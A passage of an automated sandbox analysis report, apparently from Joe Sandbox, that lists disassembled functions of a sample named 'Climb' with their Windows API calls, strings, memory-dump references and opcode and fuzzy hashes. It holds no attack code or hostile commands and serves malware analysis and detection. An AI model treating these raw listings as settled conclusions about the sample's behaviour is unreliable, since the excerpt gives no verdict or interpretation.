GetLastError.KERNEL32 ref: 00528A8E
__dosmaperr.LIBCMT ref: 00528AB9

Strings

OVS, xrefs: 00528A30

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: OVS
API String ID: 2583163307-2584013171
Opcode ID: 169e51aa25083775c40cd1099d5cf3eab51bb2c7375364b185578952139f4e4e
Instruction ID: b68a22ff3c470726baf7ff4a083e2af25c3289973e254bde368959c4db8e1eb8
Opcode Fuzzy Hash: 169e51aa25083775c40cd1099d5cf3eab51bb2c7375364b185578952139f4e4e
Instruction Fuzzy Hash: 450108326075706BD62462B4B849B7E6F45BFD3774F29051AF9149B1D2EF3089805290

Function 004F58CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,004F58BE,SwapMouseButtons,00000004,?), ref: 004F58EF
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,004F58BE,SwapMouseButtons,00000004,?), ref: 004F5910
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,004F58BE,SwapMouseButtons,00000004,?), ref: 004F5932

Strings

Control Panel\Mouse, xrefs: 004F58ED

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 0cb8ea43c49bbe705729e25b31cff357f8f1e1581ce4f8721d88ccd9b849a65e
Instruction ID: 3880e21041a53bf948fa270c6081768945678cad679b7ae3c8f4f55a8d32aef6
Opcode Fuzzy Hash: 0cb8ea43c49bbe705729e25b31cff357f8f1e1581ce4f8721d88ccd9b849a65e
Instruction Fuzzy Hash: B5115AB5510618FFDB258F64DC84DBF77BCEF01760B10941AEA01E7210E2759E45A768

Function 00502B20 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00503006

Strings

bnU, xrefs: 00502B36, 00502E8D
CALL, xrefs: 00502FD6

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL$bnU
API String ID: 1385522511-1101651840
Opcode ID: bdb05c7b32a0c6877172137bc4a22097a73e7e9573bf21578a9b5f7e018553be
Instruction ID: 1a4feedd3567ed830b064b1a52a1db446b69e83ef83a4ffa5bbbf4250733de5d
Opcode Fuzzy Hash: bdb05c7b32a0c6877172137bc4a22097a73e7e9573bf21578a9b5f7e018553be
Instruction Fuzzy Hash: 46229B706082069FD714DF14C888A6EBFF5BF98314F24895DF49A8B2A1D771ED85CB82

Function 004F3A95 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 0053413B

Part of subcall function 004F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004F55D1,?,?,00534B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 004F5871

Part of subcall function 004F3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004F3A76

Strings

`u[, xrefs: 00534134
X, xrefs: 00534109

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`u[
API String ID: 779396738-121079185
Opcode ID: 26244fe9272516d4573def714062b56c28e88f237c53dc4c52fcdfb4503563e0
Instruction ID: f71043b962ea6d761b68839a785fc0615513f896292d0e2b58aa48a0654ee763
Opcode Fuzzy Hash: 26244fe9272516d4573def714062b56c28e88f237c53dc4c52fcdfb4503563e0
Instruction Fuzzy Hash: 76219671A0025C9BDF01DF99C805BEE7FF8AF49314F00805AE545B7281DBF89A898F65

Function 0051014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 005109D8

Part of subcall function 00513614: RaiseException.KERNEL32(?,?,?,005109FA,?,00000000,?,?,?,?,?,?,005109FA,00000000,005B9758,00000000), ref: 00513674

__CxxThrowException@8.LIBVCRUNTIME ref: 005109F5

Strings

Unknown exception, xrefs: 00510A02

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 316623c1d01d2eb329760e710c25e69b75cb839ae03143a79d6d69e12f674f01
Instruction ID: f37b716ab5a00c5f38ff6315a181cbf5b9616bfdc1da295dfd88128ba0f45977
Opcode Fuzzy Hash: 316623c1d01d2eb329760e710c25e69b75cb839ae03143a79d6d69e12f674f01
Instruction Fuzzy Hash: 92F0C83490020EB7BF00BAA4DC5A8DE7F6C7E41350B605520B914975D2FBB0E6D6C6D0

Function 005789B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00578D52
TerminateProcess.KERNEL32(00000000), ref: 00578D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00578F3A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 94ef7557f6be520d44a5d2d5951380de3ad762ec3a937eaf586f5603349a25c6
Instruction ID: 6aefdbf8b402ff8faa34bc77dd284bfbf8dbd4f848dc93f851b1cdad15b49aee
Opcode Fuzzy Hash: 94ef7557f6be520d44a5d2d5951380de3ad762ec3a937eaf586f5603349a25c6
Instruction Fuzzy Hash: 57127C71A083019FD714DF28C488B2ABBE5FF84318F14895DE9899B392CB35ED45CB92

Function 0050FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004F61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 004F6299

KillTimer.USER32(?,00000001,?,?), ref: 0050FD36
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0050FD45
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0054FE33

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 4223e74397da5d96f1d099618586d5e05063e743ea8499155993bcda7a8498f3
Instruction ID: d781ad2087dafc9cd1ff0cf3282a1f24419bf08c5325562c3e89b6974e2d682b
Opcode Fuzzy Hash: 4223e74397da5d96f1d099618586d5e05063e743ea8499155993bcda7a8498f3
Instruction Fuzzy Hash: 75319871904754AFEB72CF248855BEABFFCBB12708F00089ED59A97142C7745A85CB51

Function 0052970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,005297BA,FF8BC369,00000000,00000002,00000000), ref: 00529744
GetLastError.KERNEL32(?,005297BA,FF8BC369,00000000,00000002,00000000,?,00525ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00516F41), ref: 0052974E
__dosmaperr.LIBCMT ref: 00529755

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 043d0da6dcc206878fb0e2c5e9a5741abe41d708d139a0f0fca38b4aad577ccf
Instruction ID: 48ca895fe977dd7d922492cb6d905df2017f669ba892cebc68f1971fccdaab21
Opcode Fuzzy Hash: 043d0da6dcc206878fb0e2c5e9a5741abe41d708d139a0f0fca38b4aad577ccf
Instruction Fuzzy Hash: E101DD32620525ABCB159F99EC05CAE7F69FFC7330F280259FC11972D0EA719D5197A0

Function 00501990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16913b175d888af4901f6ff36d45d4cc0fbd831cbc87005bdb7f653099c46afe
Instruction ID: 55d253ea943eb3212a73e17747a1bbd3263c9d4430ff52e161ed7cbfb79015f8
Opcode Fuzzy Hash: 16913b175d888af4901f6ff36d45d4cc0fbd831cbc87005bdb7f653099c46afe
Instruction Fuzzy Hash: 2632DF30A00606EFDB10DF54C885BEEBBB4FF52318F148919E815AB291DB35ED84CB96

Function 0050FFE0 Relevance: 3.1, APIs: 2, Instructions: 94COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 0051007D
SetErrorMode.KERNEL32 ref: 0051008F

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CloseErrorHandleMode
String ID:
API String ID: 3953868439-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: cf830085b27a47ad58e302580d7618d426e5c76e17f6dd2b70ae5ad3971f17a4
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 6831E674A00105DFE718DF58D488AA9FBB5FF49300BA496A5E409CB292D7B2EDC1CBC0

Function 004F396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 004F3A3C

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 56b5f7ba91c00e9e575d0b6710cca245c2fd68a28e4a96a9533f1a1c129eccf0
Instruction ID: bdcc766dfbae9a2bc12dcebbbe434247e6ad48bb39de0ad0b6d5cf12e1a3babc
Opcode Fuzzy Hash: 56b5f7ba91c00e9e575d0b6710cca245c2fd68a28e4a96a9533f1a1c129eccf0
Instruction Fuzzy Hash: 113193B06047058FD720DF25D884BA7BBF8FB58709F00092EEAD987351E7B5A948CB56

Function 004F331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 004F333D

Part of subcall function 004F32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 004F32FB
Part of subcall function 004F32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004F3312

Part of subcall function 004F338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,004F3368,?), ref: 004F33BB
Part of subcall function 004F338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,004F3368,?), ref: 004F33CE
Part of subcall function 004F338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,005C2418,005C2400,?,?,?,?,?,?,004F3368,?), ref: 004F343A
Part of subcall function 004F338B: SetCurrentDirectoryW.KERNEL32(?,00000001,005C2418,?,?,?,?,?,?,?,004F3368,?), ref: 004F34BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 004F3377

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 68fc59f1fb8f5c180aefd94e4fe74804dd465ef161315d44c51db34a4cc7337a
Instruction ID: dee0e1f7e4882973ccd00196d91df362ade03cb584152e16ee55c5130d9feb05
Opcode Fuzzy Hash: 68fc59f1fb8f5c180aefd94e4fe74804dd465ef161315d44c51db34a4cc7337a
Instruction Fuzzy Hash: F2F05432554B889FE701AF60EC0AF643BA0B764B0BF004C1BBE05961E2DBBE4159AB54

Function 004FCAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004FCEEE

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 174e500a03d1e0635f6c93f84aba096ef86094490a11353317a098215e7dafff
Instruction ID: 017c64991c7b9be2a8b75db5cddd3ac4e4a3f8174b307881a6020299627a5945
Opcode Fuzzy Hash: 174e500a03d1e0635f6c93f84aba096ef86094490a11353317a098215e7dafff
Instruction Fuzzy Hash: C232BD74A0064D9FDB10CF54C984AFEBBB5FF44308F14845AEA06AB291C778AD85CB99

Function 00577AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 66a1ad8064310c78002b130ba32577a3cec20e8e96ee56330e0ca9f3f54e2eb4
Instruction ID: 6775cadc94264884cd4ca85b662effb47ddbd1145799c821c5908944037da53a
Opcode Fuzzy Hash: 66a1ad8064310c78002b130ba32577a3cec20e8e96ee56330e0ca9f3f54e2eb4
Instruction Fuzzy Hash: F8D16C74A0420ADFCB14EF94E8819FDBBB5FF48314F14815AE919AB291EB30AD41DF94

Function 0051F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42806355091becacacd2778329222c77e48c08e79c54610e8163d5c0f535614c
Instruction ID: a0035d276f3c0fd2892ac93761782ead6634cd8f926a9e28beedca7cfcbf439c
Opcode Fuzzy Hash: 42806355091becacacd2778329222c77e48c08e79c54610e8163d5c0f535614c
Instruction Fuzzy Hash: E951BB79A00118AFEB10DF58CC45AE97FA1FFC5364F198168E8199B391D771ED82CB50

Function 0055FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0055FCCE

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: b9bde81ae4733a055c1d49b91c43377938b3a8948e6a5bc29c098ad9e601c60b
Instruction ID: 43740b317c718574b50150c20b865e75023ffc9c8d34c9fff94e3da05ae21b3e
Opcode Fuzzy Hash: b9bde81ae4733a055c1d49b91c43377938b3a8948e6a5bc29c098ad9e601c60b
Instruction Fuzzy Hash: 1841E472500209AFDB11EF68C8909AEBBB9FF44315B21453FEA12D7291EB70DE48CB50

Function 004F6679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 004F663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,004F668B,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F664A
Part of subcall function 004F663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 004F665C
Part of subcall function 004F663E: FreeLibrary.KERNEL32(00000000,?,?,004F668B,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F66AB

Part of subcall function 004F6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00535657,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F6610
Part of subcall function 004F6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 004F6622
Part of subcall function 004F6607: FreeLibrary.KERNEL32(00000000,?,?,00535657,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F6635

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 1dd6666314a3ef7f403d3791303ae9ca7e970ad36fcc9787a80b5096cc9f4724
Instruction ID: d9e61cb16a0fcf75bc01ba7cfbe12489dde9b4f3b4e52b09f1f78cf4970573c2
Opcode Fuzzy Hash: 1dd6666314a3ef7f403d3791303ae9ca7e970ad36fcc9787a80b5096cc9f4724
Instruction Fuzzy Hash: A311E772600209AADF14BB25C803BBD7BA5AF50718F11442FF643E61C2EE79DA059B68

Function 00528782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 005287C0

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 5dffb18c2a04fa28b687d0ca80b91dbaf07d6ce0fb44c2a01573d71e519ea0ae
Instruction ID: f6b7d2a5aea5586e69e9d2f3a950ccc2557333ad00a33d155357dbe09b920472
Opcode Fuzzy Hash: 5dffb18c2a04fa28b687d0ca80b91dbaf07d6ce0fb44c2a01573d71e519ea0ae
Instruction Fuzzy Hash: A111487190420AAFCB05DF98E9449AA7BF4FF49300F1444A9F808AB351DA31EA218BA4

Function 0051E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

